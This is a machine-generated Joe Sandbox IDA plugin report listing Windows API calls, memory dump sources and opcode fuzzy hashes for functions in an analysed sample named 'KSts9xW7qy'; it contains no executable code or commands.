                                                                        • EnumChildWindows.USER32(?,00EACAC4), ref: 00EACA76
                                                                        • __swprintf.LIBCMT ref: 00EACA90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                        • String ID: %s%d
                                                                        • API String ID: 3187004680-1110647743
                                                                        • Opcode ID: 885712a1b6052e411ab6c1bf3215071f455d55b5be12a1f74ca6b28726fbe3ed
                                                                        • Instruction ID: 89cf80fec1977db6509f68caf61f4729794df387022a0ed9c80ded72370ececd
                                                                        • Opcode Fuzzy Hash: 885712a1b6052e411ab6c1bf3215071f455d55b5be12a1f74ca6b28726fbe3ed
                                                                        • Instruction Fuzzy Hash: 8811AF716002097BCB01BFA08C86FB93BA9AB49704F109066FA1DBE086CB74A945DB71
                                                                        APIs
                                                                        • __lock.LIBCMT ref: 00E97AD8
                                                                          • Part of subcall function 00E97CF4: __mtinitlocknum.LIBCMT ref: 00E97D06
                                                                          • Part of subcall function 00E97CF4: EnterCriticalSection.KERNEL32(00000000,?,00E97ADD,0000000D), ref: 00E97D1F
                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00E97AE5
                                                                        • __lock.LIBCMT ref: 00E97AF9
                                                                        • ___addlocaleref.LIBCMT ref: 00E97B17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                        • String ID: `
                                                                        • API String ID: 1687444384-4168407445
                                                                        • Opcode ID: b3de3e84b3528dc41c9b2e5cddca6a158a9ab5932c65f928c4b5b70d0a660a31
                                                                        • Instruction ID: 4dbdcf3c396ae5d9d98224d7f6c966c5ffa4ddcfd399573fc04cfde8da356ef7
                                                                        • Opcode Fuzzy Hash: b3de3e84b3528dc41c9b2e5cddca6a158a9ab5932c65f928c4b5b70d0a660a31
                                                                        • Instruction Fuzzy Hash: 69016D71505B01AFDB20DF75D90674ABBF0EF44725F20990EA4DAA76A0DBB0A684CB01
                                                                        APIs
                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00ED19F3
                                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00ED1A26
                                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00ED1B49
                                                                        • CloseHandle.KERNEL32(?), ref: 00ED1BBF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                        • String ID:
                                                                        • API String ID: 2364364464-0
                                                                        • Opcode ID: 4f9088018a6b7b9555442a8b4633be89ec79a6769cd20105d79ed2c39e1bc607
                                                                        • Instruction ID: bbd78baf97af00130a8c0111940b9da09601e5e003cc9eab96585276c5dbda0e
                                                                        • Opcode Fuzzy Hash: 4f9088018a6b7b9555442a8b4633be89ec79a6769cd20105d79ed2c39e1bc607
                                                                        • Instruction Fuzzy Hash: 27815070600204EFDF10AF64C896BADBBE5EF44720F14949AF909BF392D7B5A941CB90
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 00EB1CB4
                                                                        • VariantClear.OLEAUT32(00000013), ref: 00EB1D26
                                                                        • VariantClear.OLEAUT32(00000000), ref: 00EB1D81
                                                                        • VariantClear.OLEAUT32(?), ref: 00EB1DF8
                                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EB1E26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$Clear$ChangeInitType
                                                                        • String ID:
                                                                        • API String ID: 4136290138-0
                                                                        • Opcode ID: fd5e8316c4512117686cd803b3e4127617f7cc902b928a7af9307021176c62c1
                                                                        • Instruction ID: 9ce294535337145239b108c77a9d85789846fd7537d3bd08e5a32ef6e5b11001
                                                                        • Opcode Fuzzy Hash: fd5e8316c4512117686cd803b3e4127617f7cc902b928a7af9307021176c62c1
                                                                        • Instruction Fuzzy Hash: 805149B5A00209AFDB14CF58C890AEAB7B9FF8D314B158559ED59EB300D330EA51CBA0
                                                                        APIs
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00ED06EE
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00ED077D
                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00ED079B
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00ED07E1
                                                                        • FreeLibrary.KERNEL32(00000000,00000004), ref: 00ED07FB
                                                                          • Part of subcall function 00E8E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00EBA574,?,?,00000000,00000008), ref: 00E8E675
                                                                          • Part of subcall function 00E8E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00EBA574,?,?,00000000,00000008), ref: 00E8E699
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 327935632-0
                                                                        • Opcode ID: 6200c47414d806d4c457f7ed2b40dec97e3e1e2753fede64ed86585002fea644
                                                                        • Instruction ID: 45f21a487736a9c876a1ea522cb3855a871fe867fd89d5bec3ef75fccfbb09fa
                                                                        • Opcode Fuzzy Hash: 6200c47414d806d4c457f7ed2b40dec97e3e1e2753fede64ed86585002fea644
                                                                        • Instruction Fuzzy Hash: 13511875A00205DFCB04EFA8C881AADB7F5EF59314F18905AE919BB352DB30ED46DB81
                                                                        APIs
                                                                          • Part of subcall function 00ED3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED2EEF
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ED2F2E
                                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00ED2F75
                                                                        • RegCloseKey.ADVAPI32(?,?), ref: 00ED2FA1
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00ED2FAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                        • String ID:
                                                                        • API String ID: 3740051246-0
                                                                        • Opcode ID: 1c6f7a8839da6a3771f9cf08a59fce9872df0c45adf571db1160ad151b5feec7
                                                                        • Instruction ID: 3ec88e2f0d879753ec23533d45c627781f75f53badee8a33897747c4e0496b73
                                                                        • Opcode Fuzzy Hash: 1c6f7a8839da6a3771f9cf08a59fce9872df0c45adf571db1160ad151b5feec7
                                                                        • Instruction Fuzzy Hash: 76515D71208204AFD704EF64CC81E6AB7F9FF88304F14981EF699A72A1DB31E905DB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f7f0a9caa9fa0f8288c806d69a617c96a5cdd029d64d92ef9c1264f7c28e719
                                                                        • Instruction ID: 5179c3a2d8ea2c41dd3cf6ca0db30bb2b194e904f4e260b40d05b1386cc02b74
                                                                        • Opcode Fuzzy Hash: 6f7f0a9caa9fa0f8288c806d69a617c96a5cdd029d64d92ef9c1264f7c28e719
                                                                        • Instruction Fuzzy Hash: F841A279904106AFC710DF688C44FB9BF66EB493A4F252226E95AF73D1C630AD42D650
                                                                        APIs
                                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EC12B4
                                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00EC12DD
                                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EC131C
                                                                          • Part of subcall function 00E7936C: __swprintf.LIBCMT ref: 00E793AB
                                                                          • Part of subcall function 00E7936C: __itow.LIBCMT ref: 00E793DF
                                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EC1341
                                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EC1349
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                        • String ID:
                                                                        • API String ID: 1389676194-0
                                                                        • Opcode ID: 96b4069f0311ec564dd55be516dd0b5c4cf327586005d490bb72998b33e5f82e
                                                                        • Instruction ID: 513b7f9229e2892f78bd25ce9f4499aacb90243865dc0795f6f4f9d116fce5d1
                                                                        • Opcode Fuzzy Hash: 96b4069f0311ec564dd55be516dd0b5c4cf327586005d490bb72998b33e5f82e
                                                                        • Instruction Fuzzy Hash: 8141F635A00505EFDB05EF64C981AAEBBF5EF49314B149099E90ABB3A2CB31ED11DB50
                                                                        APIs
                                                                        • GetCursorPos.USER32(000000FF), ref: 00E8B64F
                                                                        • ScreenToClient.USER32(00000000,000000FF), ref: 00E8B66C
                                                                        • GetAsyncKeyState.USER32(00000001), ref: 00E8B691
                                                                        • GetAsyncKeyState.USER32(00000002), ref: 00E8B69F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                        • String ID:
                                                                        • API String ID: 4210589936-0
                                                                        • Opcode ID: df69cc26c98168db00c4641a14019a8ac2864021f2f11fdefe7ef259f3f8fff8
                                                                        • Instruction ID: 5be7022b1a43b3362130bdd433c0ac8b2239de477ac819fbf219377bcae8d6ed
                                                                        • Opcode Fuzzy Hash: df69cc26c98168db00c4641a14019a8ac2864021f2f11fdefe7ef259f3f8fff8
                                                                        • Instruction Fuzzy Hash: 68417B31608109BFCF159F65CC44AE9BBB5FB05324F20535AE829B6290DB30A994EFA1
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00EAB369
                                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00EAB413
                                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EAB41B
                                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00EAB429
                                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EAB431
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleep$RectWindow
                                                                        • String ID:
                                                                        • API String ID: 3382505437-0
                                                                        • Opcode ID: 00fcba35c78b30f70a1e82c57ad4caf1a56bf3d03cbdc76773028aeb4861baec
                                                                        • Instruction ID: b4772d5ee5787fb88eb66648e1b3d643ebdb50f5d36adf253cef32aae16ae8e4
                                                                        • Opcode Fuzzy Hash: 00fcba35c78b30f70a1e82c57ad4caf1a56bf3d03cbdc76773028aeb4861baec
                                                                        • Instruction Fuzzy Hash: 4C31B171900219EFDF04CF68DD49AAE3BB5EB49329F104225F821EA1D2C7B0A918DB50
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00EADBD7
                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EADBF4
                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EADC2C
                                                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EADC52
                                                                        • _wcsstr.LIBCMT ref: 00EADC5C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                        • String ID:
                                                                        • API String ID: 3902887630-0
                                                                        • Opcode ID: 5faf5d3ffe9222d96eefd5ce7f3ae6915c040fe138fe6a3202e9330dc948d0fe
                                                                        • Instruction ID: 0c0e4bc4217dfb60f768af4735b5d1a73332bfb2c3dd0c79d985eb9b2da52e44
                                                                        • Opcode Fuzzy Hash: 5faf5d3ffe9222d96eefd5ce7f3ae6915c040fe138fe6a3202e9330dc948d0fe
                                                                        • Instruction Fuzzy Hash: 0921F871208104BFEB155B259C49E7BBBA9DF4A760F115029F80AEE151EAA1DC01D260
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EDDEB0
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00EDDED4
                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00EDDEEC
                                                                        • GetSystemMetrics.USER32(00000004), ref: 00EDDF14
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00EC3A1E,00000000), ref: 00EDDF32
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Long$MetricsSystem
                                                                        • String ID:
                                                                        • API String ID: 2294984445-0
                                                                        • Opcode ID: 9e33730f9436ed0c73fb5b21c5175c3cdaf14d88d3cd02a17a2cb61969b12570
                                                                        • Instruction ID: 66c7419930892e4aabd80188850899b199a90ccb54a9567d7c17f5e7fe13524b
                                                                        • Opcode Fuzzy Hash: 9e33730f9436ed0c73fb5b21c5175c3cdaf14d88d3cd02a17a2cb61969b12570
                                                                        • Instruction Fuzzy Hash: C321F531A18216AFCB204F79CC44B6A3B95FB55338F151726FD36EA2E0D7309852DB80
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EABC90
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EABCC2
                                                                        • __itow.LIBCMT ref: 00EABCDA
                                                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EABD00
                                                                        • __itow.LIBCMT ref: 00EABD11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$__itow
                                                                        • String ID:
                                                                        • API String ID: 3379773720-0
                                                                        • Opcode ID: 55807e04640057130fb9ae83919a3d33ee3b575af8c16b03b4ae95352ba6f9f2
                                                                        • Instruction ID: b3d0a7a53b034901c2a67c09cbf5c81bf2b797411fb78c720fe43ba8df15467b
                                                                        • Opcode Fuzzy Hash: 55807e04640057130fb9ae83919a3d33ee3b575af8c16b03b4ae95352ba6f9f2
                                                                        • Instruction Fuzzy Hash: 6B21D8357007187BDB10AE658C46FDE7BA9AF8E724F016064F90AFF182DB70E90597A1
                                                                        APIs
                                                                          • Part of subcall function 00E750E6: _wcsncpy.LIBCMT ref: 00E750FA
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,00EB60C3), ref: 00EB6369
                                                                        • GetLastError.KERNEL32(?,?,?,00EB60C3), ref: 00EB6374
                                                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00EB60C3), ref: 00EB6388
                                                                        • _wcsrchr.LIBCMT ref: 00EB63AA
                                                                          • Part of subcall function 00EB6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00EB60C3), ref: 00EB63E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                         • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                        • String ID:
                                                                        • API String ID: 3633006590-0
                                                                        • Opcode ID: 4da4e8a586378a1f24a6fcffba2d14e75364a748edc61f269a9539cb58926152
                                                                        • Instruction ID: 1653857329453d468719f2ebad71b6a4b08891608c117f70b73b9a1a7d57f9e2
                                                                        • Opcode Fuzzy Hash: 4da4e8a586378a1f24a6fcffba2d14e75364a748edc61f269a9539cb58926152
                                                                        • Instruction Fuzzy Hash: 0F21D8315042159ADF15BB78AC46FFF23ECAF59364F102465F049F70D0EB68D9848A64
                                                                        APIs
                                                                          • Part of subcall function 00ECA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00ECA84E
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00EC8BD3
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8BE2
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00EC8BFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 3701255441-0
                                                                        • Opcode ID: 5543e8d3f59422b12d101662b4ca09a12efa0afda30e99938027d3dd5ee2b08e
                                                                        • Instruction ID: 8f47695233540988db1714e8a775afdfca619444ad96687ca476184fab3c7a53
                                                                        • Opcode Fuzzy Hash: 5543e8d3f59422b12d101662b4ca09a12efa0afda30e99938027d3dd5ee2b08e
                                                                        • Instruction Fuzzy Hash: 2B219F312041149FCB10AB68CE45FBEB7E9AF84714F04545DF946BB3D2CB70AC068751
                                                                        APIs
                                                                        • IsWindow.USER32(00000000), ref: 00EC8441
                                                                        • GetForegroundWindow.USER32 ref: 00EC8458
                                                                        • GetDC.USER32(00000000), ref: 00EC8494
                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 00EC84A0
                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 00EC84DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
